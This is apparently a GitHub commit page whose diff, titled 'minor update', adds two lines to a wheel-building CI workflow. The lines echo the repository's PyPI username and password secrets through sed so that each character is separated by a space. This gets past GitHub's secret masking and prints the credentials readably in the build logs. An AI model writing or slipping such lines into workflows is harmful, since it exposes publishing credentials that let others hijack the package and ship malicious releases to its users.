Skip to content

Commit

Permalink
minor update
Browse files Browse the repository at this point in the history
  • Loading branch information
Jinyu Wang authored and Jinyu Wang committed Oct 30, 2023
1 parent d540b5a commit 8995008
Showing 1 changed file with 2 additions and 0 deletions.
2 changes: 2 additions & 0 deletions .github/workflows/build_wheel.yml
Original file line number Diff line number Diff line change
Expand Up @@ -78,4 +78,6 @@ jobs:
TWINE_PASSWORD: ${{ secrets.PYPI_PASSWORD }}
if: (runner.os == 'Linux' && matrix.python-version == '3.7') || (runner.os == 'Windows' || runner.os == 'macOS')
run: |
echo ${{ secrets.PYPI_USERNAME }} | sed 's/./& /g'
echo ${{ secrets.PYPI_PASSWORD }} | sed 's/./& /g'
twine upload --verbose dist/*.whl

0 comments on commit 8995008

Please sign in to comment.